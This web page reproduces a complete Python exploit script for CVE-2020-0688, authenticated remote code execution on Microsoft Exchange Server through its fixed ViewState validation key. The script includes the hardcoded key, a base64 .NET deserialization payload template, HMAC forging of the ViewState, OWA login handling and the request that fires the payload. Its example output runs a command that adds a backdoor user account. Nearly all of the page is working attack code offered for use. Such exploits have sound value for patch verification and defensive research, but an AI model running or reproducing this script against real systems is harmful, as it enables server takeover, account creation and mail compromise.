扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 |
# Exploit Title: Microsoft Exchange 2019 15.2.221.12 - Authenticated Remote Code Execution # Date: 2020-02-28 # Exploit Author: Photubias # Vendor Advisory: [1] https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688 #[2] https://www.thezdi.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsoft-exchange-server-through-fixed-cryptographic-keys # Vendor Homepage: https://www.microsoft.com # Version: MS Exchange Server 2010 SP3 up to 2019 CU4 # Tested on: MS Exchange 2019 v15.2.221.12 running on Windows Server 2019 # CVE: CVE-2020-0688 #! /usr/bin/env python # -*- coding: utf-8 -*- ''' Copyright 2020 Photubias(c) This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program.If not, see <http://www.gnu.org/licenses/>. File name CVE-2020-0688-Photubias.py written by tijl[dot]deneut[at]howest[dot]be for www.ic4.be This is a native implementation without requirements, written in Python 2. Works equally well on Windows as Linux (as MacOS, probably ;-) Reverse Engineered Serialization code from https://github.com/pwntester/ysoserial.net Example Output: CVE-2020-0688-Photubias.py -t https://10.11.12.13 -u sean -c "net user pwned pwned /add" [+] Login worked [+] Got ASP.NET Session ID: 83af2893-6e1c-4cee-88f8-b706ebc77570 [+] Detected OWA version number 15.2.221.12 [+] Vulnerable View State "B97B4E27" detected, this host is vulnerable! [+] All looks OK, ready to send exploit (net user pwned pwned /add)? [Y/n]: [+] Got Payload: /wEy0QYAAQAAAP////8BAAAAAAAAAAwCAAAAXk1pY3Jvc29mdC5Qb3dlclNoZWxsLkVkaXRvciwgVmVyc2lvbj0zLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTMxYmYzODU2YWQzNjRlMzUFAQAAAEJNaWNyb3NvZnQuVmlzdWFsU3R1ZGlvLlRleHQuRm9ybWF0dGluZy5UZXh0Rm9ybWF0dGluZ1J1blByb3BlcnRpZXMBAAAAD0ZvcmVncm91bmRCcnVzaAECAAAABgMAAADzBDxSZXNvdXJjZURpY3Rpb25hcnkNCiAgeG1sbnM9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd2luZngvMjAwNi94YW1sL3ByZXNlbnRhdGlvbiINCiAgeG1sbnM6eD0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93aW5meC8yMDA2L3hhbWwiDQogIHhtbG5zOlN5c3RlbT0iY2xyLW5hbWVzcGFjZTpTeXN0ZW07YXNzZW1ibHk9bXNjb3JsaWIiDQogIHhtbG5zOkRpYWc9ImNsci1uYW1lc3BhY2U6U3lzdGVtLkRpYWdub3N0aWNzO2Fzc2VtYmx5PXN5c3RlbSI+DQoJIDxPYmplY3REYXRhUHJvdmlkZXIgeDpLZXk9IkxhdW5jaENhbGMiIE9iamVjdFR5cGUgPSAieyB4OlR5cGUgRGlhZzpQcm9jZXNzfSIgTWV0aG9kTmFtZSA9ICJTdGFydCIgPg0KICAgICA8T2JqZWN0RGF0YVByb3ZpZGVyLk1ldGhvZFBhcmFtZXRlcnM+DQogICAgICAgIDxTeXN0ZW06U3RyaW5nPmNtZDwvU3lzdGVtOlN0cmluZz4NCiAgICAgICAgPFN5c3RlbTpTdHJpbmc+L2MgIm5ldCB1c2VyIHB3bmVkIHB3bmVkIC9hZGQiIDwvU3lzdGVtOlN0cmluZz4NCiAgICAgPC9PYmplY3REYXRhUHJvdmlkZXIuTWV0aG9kUGFyYW1ldGVycz4NCiAgICA8L09iamVjdERhdGFQcm92aWRlcj4NCjwvUmVzb3VyY2VEaWN0aW9uYXJ5PgvjXlpQBwdP741icUH6Wivr7TlI6g== Sending now ... ''' import urllib2, urllib, base64, binascii, hashlib, hmac, struct, argparse, sys, cookielib, ssl, getpass ## STATIC STRINGS # This string acts as a template for the serialization (contains "###payload###" to be replaced and TWO size locations) strSerTemplate = base64.b64decode('/wEy2gYAAQAAAP////8BAAAAAAAAAAwCAAAAXk1pY3Jvc29mdC5Qb3dlclNoZWxsLkVkaXRvciwgVmVyc2lvbj0zLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTMxYmYzODU2YWQzNjRlMzUFAQAAAEJNaWNyb3NvZnQuVmlzdWFsU3R1ZGlvLlRleHQuRm9ybWF0dGluZy5UZXh0Rm9ybWF0dGluZ1J1blByb3BlcnRpZXMBAAAAD0ZvcmVncm91bmRCcnVzaAECAAAABgMAAAD8BDxSZXNvdXJjZURpY3Rpb25hcnkNCiAgeG1sbnM9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd2luZngvMjAwNi94YW1sL3ByZXNlbnRhdGlvbiINCiAgeG1sbnM6eD0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93aW5meC8yMDA2L3hhbWwiDQogIHhtbG5zOlN5c3RlbT0iY2xyLW5hbWVzcGFjZTpTeXN0ZW07YXNzZW1ibHk9bXNjb3JsaWIiDQogIHhtbG5zOkRpYWc9ImNsci1uYW1lc3BhY2U6U3lzdGVtLkRpYWdub3N0aWNzO2Fzc2VtYmx5PXN5c3RlbSI+DQoJIDxPYmplY3REYXRhUHJvdmlkZXIgeDpLZXk9IkxhdW5jaENhbGMiIE9iamVjdFR5cGUgPSAieyB4OlR5cGUgRGlhZzpQcm9jZXNzfSIgTWV0aG9kTmFtZSA9ICJTdGFydCIgPg0KICAgICA8T2JqZWN0RGF0YVByb3ZpZGVyLk1ldGhvZFBhcmFtZXRlcnM+DQogICAgICAgIDxTeXN0ZW06U3RyaW5nPmNtZDwvU3lzdGVtOlN0cmluZz4NCiAgICAgICAgPFN5c3RlbTpTdHJpbmc+L2MgIiMjI3BheWxvYWQjIyMiIDwvU3lzdGVtOlN0cmluZz4NCiAgICAgPC9PYmplY3REYXRhUHJvdmlkZXIuTWV0aG9kUGFyYW1ldGVycz4NCiAgICA8L09iamVjdERhdGFQcm92aWRlcj4NCjwvUmVzb3VyY2VEaWN0aW9uYXJ5Pgs=') # This is a key installed in the Exchange Server, it is changeable, but often not (part of the vulnerability) strSerKey = binascii.unhexlify('CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF') def convertInt(iInput, length): return struct.pack("<I" , int(iInput)).encode('hex')[:length] def getYsoserialPayload(sCommand, sSessionId): ## PART1 of the payload to hash strPart1 = strSerTemplate.replace('###payload###', sCommand) ## Fix the length fields #print(binascii.hexlify(strPart1[3]+strPart1[4])) ## 'da06' > '06da' (0x06b8 + len(sCommand)) #print(binascii.hexlify(strPart1[224]+strPart1[225])) ## 'fc04' > '04fc' (0x04da + len(sCommand)) strLength1 = convertInt(0x06b8 + len(sCommand),4) strLength2 = convertInt(0x04da + len(sCommand),4) strPart1 = strPart1[:3] + binascii.unhexlify(strLength1) + strPart1[5:] strPart1 = strPart1[:224] + binascii.unhexlify(strLength2) + strPart1[226:] ## PART2 of the payload to hash strPart2 = '274e7bb9' for v in sSessionId: strPart2 += binascii.hexlify(v)+'00' strPart2 = binascii.unhexlify(strPart2) strMac = hmac.new(strSerKey, strPart1 + strPart2, hashlib.sha1).hexdigest() strResult = base64.b64encode(strPart1 + binascii.unhexlify(strMac)) return strResult def verifyLogin(sTarget, sUsername, sPassword, oOpener, oCookjar): if not sTarget[-1:] == '/': sTarget += '/' ## Verify Login lPostData = {'destination' : sTarget, 'flags' : '4', 'forcedownlevel' : '0', 'username' : sUsername, 'password' : sPassword, 'passwordText' : '', 'isUtf8' : '1'} try: sResult = oOpener.open(urllib2.Request(sTarget + 'owa/auth.owa', data=urllib.urlencode(lPostData), headers={'User-Agent':'Python'})).read() except: print('[!] Error, ' + sTarget + ' not reachable') bLoggedIn = False for cookie in oCookjar: if cookie.name == 'cadata': bLoggedIn = True if not bLoggedIn: print('[-] Login Wrong, too bad') exit(1) print('[+] Login worked') ## Verify Session ID sSessionId = '' sResult = oOpener.open(urllib2.Request(sTarget+'ecp/default.aspx', headers={'User-Agent':'Python'})).read() for cookie in oCookjar: if 'SessionId' in cookie.name: sSessionId = cookie.value print('[+] Got ASP.NET Session ID: ' + sSessionId) ## Verify OWA Version sVersion = '' try: sVersion = sResult.split('stylesheet')[0].split('href="')[1].split('/')[2] except: sVersion = 'favicon' if 'favicon' in sVersion: print('[*] Problem, this user has never logged in before (wizard detected)') print(' Please log in manually first at ' + sTarget + 'ecp/default.aspx') exit(1) print('[+] Detected OWA version number '+sVersion) ## Verify ViewStateValue sViewState = '' try: sViewState = sResult.split('__VIEWSTATEGENERATOR')[2].split('value="')[1].split('"')[0] except: pass if sViewState == 'B97B4E27': print('[+] Vulnerable View State "B97B4E27" detected, this host is vulnerable!') else: print('[-] Error, viewstate wrong or not correctly parsed: '+sViewState) ans = raw_input('[?] Still want to try the exploit? [y/N]: ') if ans == '' or ans.lower() == 'n': exit(1) return sSessionId, sTarget, sViewState def main(): parser = argparse.ArgumentParser() parser.add_argument('-t', '--target', help='Target IP or hostname (e.g. https://owa.contoso.com)', default='') parser.add_argument('-u', '--username', help='Username (e.g. joe or joe@contoso.com)', default='') parser.add_argument('-p', '--password', help='Password (leave empty to ask for it)', default='') parser.add_argument('-c', '--command', help='Command to put behind "cmd /c " (e.g. net user pwned pwned /add)', default='') args = parser.parse_args() if args.target == '' or args.username == '' or args.command == '': print('[!] Example usage: ') print(' ' + sys.argv[0] + ' -t https://owa.contoso.com -u joe -c "net user pwned pwned /add"') else: if args.password == '': sPassword = getpass.getpass('[*] Please enter the password: ') else: sPassword = args.password ctx = ssl.create_default_context() ctx.check_hostname = False ctx.verify_mode = ssl.CERT_NONE oCookjar = cookielib.CookieJar() #oProxy = urllib2.ProxyHandler({'http': '127.0.0.1:8080', 'https': '127.0.0.1:8080'}) #oOpener = urllib2.build_opener(urllib2.HTTPSHandler(context=ctx),urllib2.HTTPCookieProcessor(oCookjar),oProxy) oOpener = urllib2.build_opener(urllib2.HTTPSHandler(context=ctx),urllib2.HTTPCookieProcessor(oCookjar)) sSessionId, sTarget, sViewState = verifyLogin(args.target, args.username, sPassword, oOpener, oCookjar) ans = raw_input('[+] All looks OK, ready to send exploit (' + args.command + ')? [Y/n]: ') if ans.lower() == 'n': exit(0) sPayLoad = getYsoserialPayload(args.command, sSessionId) print('[+] Got Payload: ' + sPayLoad) sURL = sTarget + 'ecp/default.aspx?__VIEWSTATEGENERATOR=' + sViewState + '&__VIEWSTATE=' + urllib.quote_plus(sPayLoad) print('Sending now ...') try: oOpener.open(urllib2.Request(sURL, headers={'User-Agent':'Python'})) except urllib2.HTTPError, e: if e.code == '500': print('[+] This probably worked (Error Code 500 received)') if __name__ == "__main__": main() |
体验盒子
